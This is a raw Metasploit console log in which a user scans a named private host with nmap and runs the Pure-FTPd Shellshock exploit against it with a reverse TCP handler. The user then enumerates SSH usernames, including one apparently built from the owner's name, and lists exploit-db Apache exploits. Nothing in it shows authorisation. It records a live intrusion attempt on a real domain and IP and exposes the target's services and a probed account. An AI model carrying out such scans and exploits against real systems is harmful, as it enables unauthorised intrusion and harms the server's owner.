1root@kali:~#
2root@kali:~#
3root@kali:~#
4root@kali:~# /etc/init.d/postgresql start
5Starting postgresql (via systemctl): postgresql.service.
6root@kali:~# msfconsole
7
8 ___ ____
9 ,-"" `. < HONK >
10 ,' _ e )`-._ / ----
11 / ,' `-._<.===-'
12 / /
13 / ;
14 _ / ;
15 (`._ _.-"" ""--..__,' |
16 <_ `-"" \
17 <`- :
18 (__ <__. ;
19 `-. '-.__. _.' /
20 \ `-.__,-' _,'
21 `._ , /__,-'
22 ""._\__,'< <____
23 | | `----.`.
24 | | \ `.
25 ; |___ \-``
26 \ --<
27 `.`.<
28 `-'
29
30
31
32 =[ metasploit v5.0.87-dev ]
33+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post ]
34+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
35+ -- --=[ 7 evasion ]
36
37Metasploit tip: Use the edit command to open the currently active module in your editor
38
39msf5 > banner
40 .;lxO0KXXXK0Oxl:.
41 ,o0WMMMMMMMMMMMMMMMMMMKd,
42 'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
43 :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
44 .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
45 lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
46 xMMMMMMMMMMWd. .oNMMMMMMMMMMk
47 oMMMMMMMMMMx. dMMMMMMMMMMx
48.WMMMMMMMMM: :MMMMMMMMMM,
49xMMMMMMMMMo lMMMMMMMMMO
50NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
51MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
52NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
53xMMMMMMMMMd ,0MMMMMMMMMMK;
54.WMMMMMMMMMc 'OMMMMMM0,
55 lMMMMMMMMMMk. .kMMO'
56 dMMMMMMMMMMWd' ..
57 cWMMMMMMMMMMMNxc'. ##########
58 .0MMMMMMMMMMMMMMMMWc #+# #+#
59 ;0MMMMMMMMMMMMMMMo. +:+
60 .dNMMMMMMMMMMMMo +#++:++#+
61 'oOWMMMMMMMMo +:+
62 .,cdkO0K; :+: :+:
63 :::::::+:
64 Metasploit
65
66 =[ metasploit v5.0.87-dev ]
67+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post ]
68+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
69+ -- --=[ 7 evasion ]
70
71Metasploit tip: View all productivity tips with the tips command
72
73msf5 > nmap -A -p 1-10000 137.74.176.105
74[*] exec: nmap -A -p 1-10000 137.74.176.105
75
76Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 16:28 UTC
77Nmap scan report for janulewicz.pl (137.74.176.105)
78Host is up (0.057s latency).
79Not shown: 9981 filtered ports
80PORT STATE SERVICE VERSION
8120/tcp closed ftp-data
8221/tcp open ftp Pure-FTPd
8322/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
84| ssh-hostkey:
85| 1024 a4:a1:35:fb:6e:6e:35:0a:62:3b:6c:10:1f:22:a4:1b (DSA)
86|_ 2048 bc:97:3f:74:c7:d8:e1:ee:b5:50:a2:80:8c:f1:05:75 (RSA)
8725/tcp open smtp Postfix smtpd
88|_smtp-commands: gm4.pl, PIPELINING, SIZE 160857600, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
89|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
9053/tcp open domain ISC BIND 9.9.5 (Debian Linux 8.0 (Jessie))
91| dns-nsid:
92|_ bind.version: 9.9.5-9+deb8u18-Debian
9380/tcp open http Apache httpd 2.4.10 ((Debian))
94|_http-title: Welcome!
95110/tcp open pop3 Dovecot pop3d
96|_pop3-capabilities: CAPA AUTH-RESP-CODE STLS SASL(PLAIN LOGIN) RESP-CODES TOP USER UIDL PIPELINING
97143/tcp open imap Dovecot imapd
98|_imap-capabilities: listed IMAP4rev1 ID OK SASL-IR LOGIN-REFERRALS capabilities AUTH=LOGINA0001 have Pre-login IDLE post-login LITERAL+ AUTH=PLAIN STARTTLS ENABLE more
99443/tcp open ssl/https?
100|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
101465/tcp open ssl/smtps?
102|_smtp-commands: Couldn't establish connection on port 465
103587/tcp open smtp Postfix smtpd
104|_smtp-commands: gm4.pl, PIPELINING, SIZE 160857600, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
105993/tcp open ssl/imaps?
106995/tcp open ssl/pop3s?
1071177/tcp closed dkmessenger
1087654/tcp closed unknown
1098087/tcp closed simplifymedia
1108765/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
111| ssh-hostkey:
112| 1024 f0:a4:a4:28:76:a9:8e:01:1b:17:a1:43:05:36:44:e1 (DSA)
113| 2048 a5:bd:f3:aa:fb:33:0e:d7:0d:af:20:76:5e:71:42:ba (RSA)
114| 256 3d:c2:00:16:63:f2:e4:a2:90:b7:d3:03:33:4e:88:01 (ECDSA)
115|_ 256 32:76:1a:a8:d9:fa:9c:44:7c:81:6e:f1:b2:fd:70:41 (ED25519)
1169080/tcp closed glrpc
1179876/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
118| http-cookie-flags:
119| /:
120| PHPSESSID:
121|_ httponly flag not set
122| http-robots.txt: 1 disallowed entry
123|_/
124|_http-title: ISPConfig
125Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%), IPFire 2.11 firewall (Linux 2.6.32) (87%)
126No exact OS matches for host (test conditions non-ideal).
127Network Distance: 13 hops
128Service Info: Host: gm4.pl; OS: Linux; CPE: cpe:/o:linux:linux_kernel
129
130TRACEROUTE (using port 7654/tcp)
131HOP RTT ADDRESS
1321 14.19 ms 192.168.0.1
1332 ...
1343 28.78 ms pl-ktw01a-rc1-ae-18-0.aorta.net (84.116.253.129)
1354 26.11 ms pl-waw26b-rc1-ae-40-0.aorta.net (84.116.133.29)
1365 23.79 ms pl-waw02a-ri1-ae-0-0.aorta.net (84.116.138.94)
1376 26.49 ms var-5-a9.pl.eu (54.36.50.12)
1387 ...
1398 46.43 ms be101.fra-fr5-sbb2-nc5.de.eu (54.36.50.116)
1409 51.56 ms be103.rbx-g2-nc5.fr.eu (94.23.122.240)
14110 ... 12
14213 53.15 ms janulewicz.pl (137.74.176.105)
143
144OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
145Nmap done: 1 IP address (1 host up) scanned in 158.21 seconds
146msf5 > searchexploit Interrupt: use the 'exit' command to quit
147msf5 > searchexploit Pure-FTPd
148[-] Unknown command: searchexploit.
149msf5 > searchsploit Pure-FTPd
150[*] exec: searchsploit Pure-FTPd
151
152-------------------------------------------------------------------------------- ---------------------------------
153 Exploit Title | Path
154-------------------------------------------------------------------------------- ---------------------------------
155Pure-FTPd - External Authentication Bash Environment Variable Code Injection (M | linux/remote/34862.rb
156Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (P | linux/dos/20479.pl
157-------------------------------------------------------------------------------- ---------------------------------
158Shellcodes: No Results
159msf5 > mfsconsole
160[-] Unknown command: mfsconsole.
161msf5 > search Pure-FTPd
162
163Matching Modules
164================
165
166 # Name Disclosure Date Rank Check Description
167 - ---- --------------- ---- ----- -----------
168 0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
169
170
171msf5 > use exploit/multi/ftp/pureftpd_bash_env_exec
172msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > show option
173[-] Invalid parameter "option", use "show -h" for more information
174msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
175
176Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
177
178 Name Current Setting Required Description
179 ---- --------------- -------- -----------
180 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
181 RPATH /bin yes Target PATH for binaries used by the CmdStager
182 RPORT 21 yes The target port (TCP)
183 SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
184 SRVPORT 8080 yes The local port to listen on.
185 SSL false no Negotiate SSL for incoming connections
186 SSLCert no Path to a custom SSL certificate (default is randomly generated)
187 URIPATH no The URI to use for this exploit (default is random)
188
189
190Exploit target:
191
192 Id Name
193 -- ----
194 0 Linux x86
195
196
197msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOST
198[-] Unknown variable
199Usage: set [option] [value]
200
201Set the given option to value. If value is omitted, print the current value.
202If both are omitted, print options that are currently set.
203
204If run from a module context, this will set the value in the module's
205datastore. Use -g to operate on the global datastore.
206
207If setting a PAYLOAD, this command can take an index from `show payloads'.
208
209msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS
210[-] Unknown variable
211Usage: set [option] [value]
212
213Set the given option to value. If value is omitted, print the current value.
214If both are omitted, print options that are currently set.
215
216If run from a module context, this will set the value in the module's
217datastore. Use -g to operate on the global datastore.
218
219If setting a PAYLOAD, this command can take an index from `show payloads'.
220
221msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 135.74.176.105
222RHOSTS => 135.74.176.105
223msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > exploit
224
225[*] Started reverse TCP handler on 192.168.0.213:4444
226[-] 135.74.176.105:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (135.74.176.105:21).
227[*] Exploit completed, but no session was created.
228msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 137.74.176.105
229RHOSTS => 137.74.176.105
230msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > exploit
231
232[*] Started reverse TCP handler on 192.168.0.213:4444
233[*] 137.74.176.105:21 - Command Stager progress - 59.86% done (498/832 bytes)
234[*] 137.74.176.105:21 - Command Stager progress - 100.60% done (837/832 bytes)
235[*] Exploit completed, but no session was created.
236msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > back
237msf5 > searchsploit OpenSSH 5.1p1
238[*] exec: searchsploit OpenSSH 5.1p1
239
240-------------------------------------------------------------------------------- ---------------------------------
241 Exploit Title | Path
242-------------------------------------------------------------------------------- ---------------------------------
243OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
244OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
245OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
246OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
247OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets | linux/local/40962.txt
248OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
249OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
250-------------------------------------------------------------------------------- ---------------------------------
251Shellcodes: No Results
252msf5 > use linux_x86-64/remote/45000.c
253[-] No results from search
254[-] Failed to load module: linux_x86-64/remote/45000.c
255msf5 > search OpenSSH 5.1p1
256
257Matching Modules
258================
259
260 # Name Disclosure Date Rank Check Description
261 - ---- --------------- ---- ----- -----------
262 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
263 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
264 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
265 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
266 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
267
268
269msf5 > searchsploit OpenSSH 6.7p1
270[*] exec: searchsploit OpenSSH 6.7p1
271
272-------------------------------------------------------------------------------- ---------------------------------
273 Exploit Title | Path
274-------------------------------------------------------------------------------- ---------------------------------
275OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
276OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
277OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets | linux/local/40962.txt
278OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
279OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
280-------------------------------------------------------------------------------- ---------------------------------
281Shellcodes: No Results
282msf5 > msfconsole
283[-] msfconsole cannot be run inside msfconsole
284msf5 > search OpenSSH 6.7p1
285
286Matching Modules
287================
288
289 # Name Disclosure Date Rank Check Description
290 - ---- --------------- ---- ----- -----------
291 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
292 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
293 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
294 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
295 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
296
297
298msf5 > use auxiliary/scanner/ssh/ssh_enumusers
299msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 137.74.176.105
300RHOSTS => 137.74.176.105
301msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit
302
303[*] 137.74.176.105:22 - SSH - Using malformed packet technique
304[-] Please populate USERNAME or USER_FILE
305[*] Scanned 1 of 1 hosts (100% complete)
306[*] Auxiliary module execution completed
307msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options
308
309Module options (auxiliary/scanner/ssh/ssh_enumusers):
310
311 Name Current Setting Required Description
312 ---- --------------- -------- -----------
313 CHECK_FALSE false no Check for false positives (random username)
314 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
315 RHOSTS 137.74.176.105 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
316 RPORT 22 yes The target port
317 THREADS 1 yes The number of concurrent threads (max one per host)
318 THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
319 USERNAME no Single username to test (username spray)
320 USER_FILE no File containing usernames, one per line
321
322
323Auxiliary action:
324
325 Name Description
326 ---- -----------
327 Malformed Packet Use a malformed packet
328
329
330msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
331USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
332msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
333
334[*] 137.74.176.105:22 - SSH - Using malformed packet technique
335[-] Please populate USERNAME or USER_FILE
336[*] Scanned 1 of 1 hosts (100% complete)
337[*] Auxiliary module execution completed
338msf5 auxiliary(scanner/ssh/ssh_enumusers) > set VERBOSE false
339VERBOSE => false
340msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
341
342[*] 137.74.176.105:22 - SSH - Using malformed packet technique
343[-] Please populate USERNAME or USER_FILE
344[*] Scanned 1 of 1 hosts (100% complete)
345[*] Auxiliary module execution completed
346msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
347USERNAME => root
348msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
349
350[*] 137.74.176.105:22 - SSH - Using malformed packet technique
351[*] 137.74.176.105:22 - SSH - Starting scan
352[-] 137.74.176.105:22 - SSH - User 'root' not found
353[*] Scanned 1 of 1 hosts (100% complete)
354[*] Auxiliary module execution completed
355msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME pjanulew
356USERNAME => pjanulew
357msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
358
359[*] 137.74.176.105:22 - SSH - Using malformed packet technique
360[*] 137.74.176.105:22 - SSH - Starting scan
361[-] 137.74.176.105:22 - SSH - User 'pjanulew' not found
362[*] Scanned 1 of 1 hosts (100% complete)
363[*] Auxiliary module execution completed
364msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME pjanulewicz
365USERNAME => pjanulewicz
366msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
367
368[*] 137.74.176.105:22 - SSH - Using malformed packet technique
369[*] 137.74.176.105:22 - SSH - Starting scan
370[-] 137.74.176.105:22 - SSH - User 'pjanulewicz' not found
371[*] Scanned 1 of 1 hosts (100% complete)
372[*] Auxiliary module execution completed
373msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 8765
374RPORT => 8765
375msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
376
377[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
378[*] 137.74.176.105:8765 - SSH - Starting scan
379[+] 137.74.176.105:8765 - SSH - User 'pjanulewicz' found
380[*] Scanned 1 of 1 hosts (100% complete)
381[*] Auxiliary module execution completed
382msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
383USERNAME => root
384msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
385
386[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
387[*] 137.74.176.105:8765 - SSH - Starting scan
388[+] 137.74.176.105:8765 - SSH - User 'root' found
389[*] Scanned 1 of 1 hosts (100% complete)
390[*] Auxiliary module execution completed
391msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME test1
392USERNAME => test1
393msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
394
395[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
396[*] 137.74.176.105:8765 - SSH - Starting scan
397[+] 137.74.176.105:8765 - SSH - User 'test1' found
398[*] Scanned 1 of 1 hosts (100% complete)
399[*] Auxiliary module execution completed
400msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME niematakiego
401USERNAME => niematakiego
402msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
403
404[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
405[*] 137.74.176.105:8765 - SSH - Starting scan
406[+] 137.74.176.105:8765 - SSH - User 'niematakiego' found
407[*] Scanned 1 of 1 hosts (100% complete)
408[*] Auxiliary module execution completed
409msf5 auxiliary(scanner/ssh/ssh_enumusers) > back
410msf5 > searchsploit bind.version: 9.9.5-9+deb8u18-Debian
411[*] exec: searchsploit bind.version: 9.9.5-9+deb8u18-Debian
412
413Exploits: No Results
414Shellcodes: No Results
415msf5 > searchsploit bind.version: 9.9.5
416[*] exec: searchsploit bind.version: 9.9.5
417
418Exploits: No Results
419Shellcodes: No Results
420msf5 > searchsploit Apache httpd 2.4.10
421[*] exec: searchsploit Apache httpd 2.4.10
422
423Exploits: No Results
424Shellcodes: No Results
425msf5 > searchsploit Apache
426[*] exec: searchsploit Apache
427
428-------------------------------------------------------------------------------- ---------------------------------
429 Exploit Title | Path
430-------------------------------------------------------------------------------- ---------------------------------
431Apache (Windows x86) - Chunked Encoding (Metasploit) | windows_x86/remote/16782.rb
432Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
433Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
434Apache - Arbitrary Long HTTP Headers Denial of Service (C) | linux/dos/371.c
435Apache - Arbitrary Long HTTP Headers Denial of Service (Perl) | multiple/dos/360.pl
436Apache - Denial of Service | linux/dos/18221.c
437Apache - httpOnly Cookie Disclosure | multiple/remote/18442.html
438Apache - Remote Memory Exhaustion (Denial of Service) | multiple/dos/17696.pl
439Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing | cgi/remote/20435.txt
440Apache 1.0/1.2/1.3 - Server Address Disclosure | multiple/remote/21067.c
441Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi | multiple/dos/19536.txt
442Apache 1.2 - Denial of Service | multiple/dos/20558.txt
443Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service | windows/dos/20272.pl
444Apache 1.3 + PHP 3 - File Disclosure | multiple/remote/20466.txt
445Apache 1.3 - Artificially Long Slash Path Directory Listing (1) | multiple/remote/20692.pl
446Apache 1.3 - Artificially Long Slash Path Directory Listing (2) | multiple/remote/20693.c
447Apache 1.3 - Artificially Long Slash Path Directory Listing (3) | multiple/remote/20694.pl
448Apache 1.3 - Artificially Long Slash Path Directory Listing (4) | multiple/remote/20695.pl
449Apache 1.3 - Directory Index Disclosure | multiple/remote/21002.txt
450Apache 1.3.12 - WebDAV Directory Listings | linux/remote/20210.txt
451Apache 1.3.14 - Mac File Protection Bypass | osx/remote/20911.txt
452Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure | windows/remote/21204.txt
453Apache 1.3.31 mod_include - Local Buffer Overflow | linux/local/587.c
454Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation | linux/local/3384.c
455Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security | linux/remote/28424.txt
456Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access | windows/remote/19975.pl
457Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service | unix/dos/22068.pl
458Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1) | unix/remote/25624.c
459Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2) | unix/remote/25625.c
460Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
461Apache 1.3.x mod_include - Local Buffer Overflow | linux/local/24694.c
462Apache 1.3.x mod_mylo - Remote Code Execution | multiple/remote/67.c
463Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting | multiple/remote/21885.txt
464Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service | linux/dos/35738.php
465Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1) | multiple/remote/21559.c
466Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2) | multiple/remote/21560.c
467Apache 2.0 - Encoded Backslash Directory Traversal | windows/remote/21697.txt
468Apache 2.0 - Full Path Disclosure | windows/remote/21719.txt
469Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow | windows_x86/remote/5330.c
470Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service | linux/dos/21854.c
471Apache 2.0.44 (Linux) - Remote Denial of Service | linux/dos/11.c
472Apache 2.0.45 - 'APR' Crash | linux/dos/38.pl
473Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service | multiple/dos/1056.pl
474Apache 2.0.4x mod_perl - File Descriptor Leakage (3) | linux/local/23581.pl
475Apache 2.0.4x mod_php - File Descriptor Leakage (1) | linux/local/23481.c
476Apache 2.0.4x mod_php - File Descriptor Leakage (2) | linux/local/23482.c
477Apache 2.0.52 - GET Denial of Service | multiple/dos/855.pl
478Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow | windows/remote/3996.c
479Apache 2.2 (Windows) - Local Denial of Service | windows/dos/15319.pl
480Apache 2.2 - Scoreboard Invalid Free On Shutdown | linux/dos/41768.txt
481Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM | windows/remote/11650.c
482Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | linux/remote/36663.txt
483Apache 2.2.2 - CGI Script Source Code Information Disclosure | multiple/remote/28365.txt
484Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting | unix/remote/30835.sh
485Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosur | windows/remote/30901.txt
486Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting | linux/remote/31052.java
487Apache 2.4.17 - Denial of Service | windows/dos/39037.php
488Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Esca | linux/local/46676.php
489Apache 2.4.23 mod_http2 - Denial of Service | linux/dos/40909.py
490Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution | php/remote/40142.php
491Apache 2.4.7 mod_status - Scoreboard Handling Race Condition | linux/dos/34133.txt
492Apache 2.x - Memory Leak | windows/dos/9.c
493Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass | linux/remote/36352.txt
494Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
495Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
496Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
497Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution | windows/remote/40857.txt
498Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure | multiple/remote/33868.txt
499Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting | multiple/remote/33905.txt
500Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit) | windows/remote/48181.rb
501Apache APR - Hash Collision Denial of Service | linux/dos/36669.txt
502Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery | multiple/webapps/15710.txt
503Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities | xml/webapps/40109.txt
504Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure | multiple/remote/29930.txt
505Apache Axis 1.4 - Remote Code Execution | multiple/remote/46682.py
506Apache Axis2 1.4.1 - Local File Inclusion | php/webapps/12721.txt
507Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation | multiple/remote/34186.txt
508Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting | multiple/webapps/12689.txt
509Apache cocoon 2.14/2.2 - Directory Traversal | multiple/remote/23282.txt
510Apache Commons FileUpload and Apache Tomcat - Denial of Service | multiple/dos/31615.rb
511Apache Continuum - Arbitrary Command Execution (Metasploit) | linux/remote/39945.rb
512Apache Continuum 1.4.2 - Multiple Vulnerabilities | java/webapps/39886.txt
513Apache CouchDB - Arbitrary Command Execution (Metasploit) | linux/remote/45019.rb
514Apache CouchDB 1.5.0 - 'uuids' Denial of Service | multiple/dos/32519.txt
515Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation | linux/webapps/44498.py
516Apache CouchDB 2.0.0 - Local Privilege Escalation | windows/local/40865.txt
517Apache CouchDB 2.3.0 - Cross-Site Scripting | multiple/webapps/46406.txt
518Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting | multiple/webapps/46595.txt
519Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
520Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
521Apache Cygwin 1.3.x/2.0.x - Directory Traversal | windows/remote/23751.txt
522Apache Geronimo 1.0 - Error Page Cross-Site Scripting | multiple/remote/27096.txt
523Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities | multiple/remote/8458.txt
524Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting | multiple/remote/32921.txt
525Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site | multiple/remote/32920.txt
526Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function) | multiple/remote/32922.html
527Apache Httpd mod_proxy - Error Page Cross-Site Scripting | multiple/webapps/47688.md
528Apache Httpd mod_rewrite - Open Redirects | multiple/webapps/47689.md
529Apache JackRabbit - WebDAV XML External Entity | java/webapps/37110.py
530Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site | jsp/webapps/32741.txt
531Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'swr.jsp?q' Cross-Site Scr | jsp/webapps/32742.txt
532Apache JackRabbit 2.0.0 - webapp XPath Injection | jsp/webapps/14617.txt
533Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
534Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasp | linux/remote/48130.rb
535Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
536Apache Jetspeed - Arbitrary File Upload (Metasploit) | java/remote/39643.rb
537Apache Libcloud Digital Ocean API - Local Information Disclosure | linux/local/38937.txt
538Apache Mina 2.0.13 - Remote Command Execution | multiple/remote/40382.txt
539Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service | multiple/dos/22505.txt
540Apache Mod_Auth_OpenID - Session Stealing | linux/local/18917.txt
541Apache mod_cgi - 'Shellshock' Remote Command Injection | linux/remote/34900.py
542Apache mod_dav / svn - Remote Denial of Service | multiple/dos/8842.pl
543Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow | linux/remote/126.c
544Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow | windows_x86/remote/6100.py
545Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow | multiple/remote/4093.pl
546Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting | multiple/remote/9993.txt
547Apache mod_proxy - Reverse Proxy Exposure | multiple/remote/17969.py
548Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow | windows_x86/remote/3680.sh
549Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit) | windows/remote/16752.rb
550Apache mod_session_crypto - Padding Oracle | multiple/webapps/40961.py
551Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt
552Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
